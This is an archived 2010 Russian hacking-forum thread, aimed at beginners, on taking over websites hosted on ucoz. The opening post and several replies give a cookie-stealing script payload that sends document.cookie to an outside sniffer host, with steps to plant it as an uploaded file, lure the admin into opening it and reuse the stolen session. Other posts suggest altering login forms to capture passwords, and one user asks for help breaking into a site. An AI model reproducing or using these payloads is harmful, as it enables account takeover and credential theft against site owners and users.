Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Взлом сайтов от хостинга ucoz

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> Взлом сайтов от хостинга ucoz
Имя
Сообщение << Старые топики   Новые топики >>
Взлом сайтов от хостинга ucoz - 2010-06-27 12:36:10.090000   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
Хоть не статья, но, думаю, новичкам будет полезно почитать :)
Требования:
- возможность заливать файлы на сервер жертвы
Идем на этот сайт: http://sniffer.xaknet.ru/ регистрируемся и выбераем сниффер (Promo) … После этого пишем в блокноте:
&lt;sсriрt&gt;img = new Image(); img.src = "путь_до сниффера?"+document.cookie;&lt;/sсriрt&gt; и сохраняем как 000.html
Заливаем файл на сервер жертвы и ждем, пока админ нажмет на ссылку. Далее смотрим логи сниффера, подменяем куки и вы админ сайта :)

PS: tested:
">
Post #: 1
RE: Взлом сайтов от хостинга ucoz - 2010-06-27 15:02:08.283333   
DePutaMadre

Сообщений: 877
Оценки: 0
Присоединился: 2010-03-30 17:33:53.833333
Какое имя лучше всего написать?
Post #: 2
RE: Взлом сайтов от хостинга ucoz - 2010-06-27 15:12:24.373333   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
Наподобие этого: 121266121
Текстовые названия лучше избегать
Post #: 3
RE: Взлом сайтов от хостинга ucoz - 2010-06-27 15:40:13.673333   
Peta4oK

Сообщений: 401
Оценки: 0
Присоединился: 2009-12-03 16:22:36.490000
У меня вопрос, можно поставить этот снифер на поддомен?
Post #: 4
RE: Взлом сайтов от хостинга ucoz - 2010-06-27 15:56:20.040000   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
Можно.
Post #: 5
RE: Взлом сайтов от хостинга ucoz - 2010-06-27 16:12:24.330000   
ZnakVoprosa

Сообщений: 37
Оценки: 0
Присоединился: 2010-01-31 19:36:50.236666
а можно ли куки посмотреть скриптом на PHP (там ведь есть переменная $_Cookie)
Post #: 6
RE: Взлом сайтов от хостинга ucoz - 2010-06-27 16:16:12.670000   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
quote:

ORIGINAL: ZnakVoprosa

а можно ли куки посмотреть скриптом на PHP (там ведь есть переменная $_Cookie)

Глюкоз не поддерживает php.
Post #: 7
RE: Взлом сайтов от хостинга ucoz - 2010-06-27 16:23:47.050000   
ZnakVoprosa

Сообщений: 37
Оценки: 0
Присоединился: 2010-01-31 19:36:50.236666
да но что мешает зарегать сайт на хостинге с поддержкой php
Post #: 8
RE: Взлом сайтов от хостинга ucoz - 2010-06-27 16:27:06.360000   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
quote:

ORIGINAL: ZnakVoprosa

да но что мешает зарегать сайт на хостинге с поддержкой php

Это отдельная тема, здесь я написал про ucoz, а не про другие сайты. Т.е. ты оффтопишь. Пиши по сабжу.
Post #: 9
RE: Взлом сайтов от хостинга ucoz - 2010-06-27 16:52:28.570000   
ZnakVoprosa

Сообщений: 37
Оценки: 0
Присоединился: 2010-01-31 19:36:50.236666
это не совсем отдельная тема
ты предлагаешь регистрировать онлайн снифер когда его можно написать самому

я просто предлагаю написать сразу скрипт который украдет куки жертвы, впихнуть его в картинку и написать жертве сообщение с етой картинкой


и еще идея: можно на своем сайте подменить (подкорректировать) форму входа то есть сделать так чтобы данные об авторизации (логин и пароль) приходили тебе на снифер (я так пару раз делал ;) )
Post #: 10
RE: Взлом сайтов от хостинга ucoz - 2010-06-27 17:20:08.100000   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
Я написал уже в соседней теме, этот способ закрыли на глюкозе.
Post #: 11
RE: Взлом сайтов от хостинга ucoz - 2010-06-27 23:43:10.890000   
fat315

Сообщений: 314
Оценки: 0
Присоединился: 2010-04-17 00:07:08.563333
эта бага больше не работает?
потому что у меня ничего не получилось[:-]
Post #: 12
RE: Взлом сайтов от хостинга ucoz - 2010-06-28 03:28:03.030000   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
Какая именно?
Post #: 13
RE: Взлом сайтов от хостинга ucoz - 2010-06-28 06:37:56.460000   
УMА

Сообщений: 58
Оценки: 0
Присоединился: 2010-06-26 19:23:37.116666
quote:

ORIGINAL: ZnakVoprosa

это не совсем отдельная тема
ты предлагаешь регистрировать онлайн снифер когда его можно написать самому

я просто предлагаю написать сразу скрипт который украдет куки жертвы, впихнуть его в картинку и написать жертве сообщение с етой картинкой


и еще идея: можно на своем сайте подменить (подкорректировать) форму входа то есть сделать так чтобы данные об авторизации (логин и пароль) приходили тебе на снифер (я так пару раз делал ;) )

+1
так намного проще будет и не так палевно.
Post #: 14
RE: Взлом сайтов от хостинга ucoz - 2010-06-28 10:52:48.910000   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
Повторяю
Этот способ на глюкозе прикрыли
Post #: 15
RE: Взлом сайтов от хостинга ucoz - 2010-06-28 10:55:53.113333   
Vb[fbk

Сообщений: 32
Оценки: 0
Присоединился: 2010-06-17 06:24:38.233333
Ну я украл куки, что дальше?*
Post #: 16
RE: Взлом сайтов от хостинга ucoz - 2010-06-28 11:01:40.106666   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
Подменить их.
Post #: 17
RE: Взлом сайтов от хостинга ucoz - 2010-06-28 11:49:52.376666   
Vb[fbk

Сообщений: 32
Оценки: 0
Присоединился: 2010-06-17 06:24:38.233333
как именно?
Post #: 18
RE: Взлом сайтов от хостинга ucoz - 2010-06-28 13:25:15.006666   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
Инструменты –> дополнительно –> управление cookies –> выбираешь куки –> нажимаешь "Изменить"
Post #: 19
RE: Взлом сайтов от хостинга ucoz - 2010-06-29 04:05:02.153333   
fafa98

Сообщений: 204
Оценки: 0
Присоединился: 2010-05-19 20:19:23.766666
а как куки спереть?
Post #: 20
RE: Взлом сайтов от хостинга ucoz - 2010-06-29 11:20:33.860000   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
Сниффером.
Post #: 21
RE: Взлом сайтов от хостинга ucoz - 2010-06-29 18:07:36.716666   
fat315

Сообщений: 314
Оценки: 0
Присоединился: 2010-04-17 00:07:08.563333
кто может показать полный пример этого
<sсriрt>img = new Image(); img.src = "путь_до сниффера?"+document.cookie;</sсriрt>
а то никак не получается(

Post #: 22
RE: Взлом сайтов от хостинга ucoz - 2010-06-29 20:14:05.270000   
ZnakVoprosa

Сообщений: 37
Оценки: 0
Присоединился: 2010-01-31 19:36:50.236666
<sсriрt>img = new Image(); img.src = "http://httpz.ru/cyeakpjjhls.gif?"+document.cookie;</sсriрt> так пробывал ?:D:D
Post #: 23
RE: Взлом сайтов от хостинга ucoz - 2010-06-29 20:19:47.830000   
TopTuK

Сообщений: 15
Оценки: 0
Присоединился: 2010-06-26 21:08:00.750000
ТС, меня интересует вопрос такой:
quote:

возможность заливать файлы на сервер жертвы

это чтобы примерно выглядело так:http:// ****.глюкоз.**/000.html ?
Или чтобы просто админ сайта, например в новости, кликнул на ссыль?
Post #: 24
RE: Взлом сайтов от хостинга ucoz - 2010-06-30 16:37:52.950000   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
Имеется в виду загрузить файл на сервер жертвы от самого пользователя, а не от админа, т.е. прикрепить файл к посту (к примеру на форуме)… Далее нужно, чтобы админ кликнул по ссылке… Смотрим логи сниффа и меняем куки…


quote:

ORIGINAL: fat315

кто может показать полный пример этого
&lt;sсriрt&gt;img = new Image(); img.src = "путь_до сниффера?"+document.cookie;&lt;/sсriрt&gt;
а то никак не получается(

<sсriрt>img = new Image(); img.src = "http://site.com/sniffer.gif?"+document.cookie;</sсriрt>
Post #: 25
RE: Взлом сайтов от хостинга ucoz - 2010-07-15 21:36:26.990000   
[Casper]

Сообщений: 501
Оценки: 0
Присоединился: 2010-06-29 11:55:29.333333
Сделал как понял
<sсriрt>img = new Image(); img.src = "http://warezanet.ucoz.ru/sniffer.gif?"+document.cookie;</sсriрt>
правильно?
или нет
Post #: 26
RE: Взлом сайтов от хостинга ucoz - 2010-08-04 16:56:18.126666   
KoJIo6oK

Сообщений: 1
Оценки: 0
Присоединился: 2010-08-04 16:17:20.753333
Люди, объёсните что не так делаю. Залил в подпись снифер и отписал на форуме. При его просмотре приходят логи. Но строка с хешем пуста(Query String: None).
Post #: 27
RE: Взлом сайтов от хостинга ucoz - 2010-08-14 23:14:29.060000   
Glavniy

Сообщений: 29
Оценки: 0
Присоединился: 2010-06-23 22:05:32.720000
Всем ещё раз говорю что юкоз вы взломаете не на долго. Пароль и админку легко востоновить через unet.com!
Даже не старайтесь.
Post #: 28
RE: Взлом сайтов от хостинга ucoz - 2010-09-20 01:22:55.856666   
Exelens

Сообщений: 1
Оценки: 0
Присоединился: 2010-09-19 23:34:49.343333
Эмм…
Что то у меня не получается.
вставлять сылку на файл или картинку кто поможет пожалуйста?
Post #: 29
RE: Взлом сайтов от хостинга ucoz - 2010-10-15 18:41:57.060000   
jura94

Сообщений: 2
Оценки: 0
Присоединился: 2010-10-12 16:39:41.790000
а кто может помочь мне взломать мне сайт? моя аська 644422319… я на сайте ничего менять не буду просто  несколько файлов скачать…
Post #: 30
RE: Взлом сайтов от хостинга ucoz - 2010-10-15 20:04:16.596666   
OLEgator007

Сообщений: 2
Оценки: 0
Присоединился: 2010-10-15 16:04:43.076666
http://sniffer.xaknet.ru/ - ссылка не рабочяя
Post #: 31
RE: Взлом сайтов от хостинга ucoz - 2010-11-14 01:54:35.970000   
26_RUSSS

Сообщений: 1
Оценки: 0
Присоединился: 2010-11-14 01:48:19.173333
киньте рабочую ссылку….)срочняк надо….взломать сайт ucoz
Post #: 32
RE: Взлом сайтов от хостинга ucoz - 2010-11-14 03:12:08.170000   
nooble

Сообщений: 7
Оценки: 0
Присоединился: 2010-11-14 02:01:59.943333
Вот это глупость :D Снифер это бред, т.к пасс восстановить не проблема через тот же юнет. Но по сути можно дел наворотить ;)
Мне тоже надо ломануть, но я больше придерживаюсь СИ, да и вам советую.
Post #: 33
Страниц:  [1]
Все форумы >> [Для начинающих] >> Взлом сайтов от хостинга ucoz







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.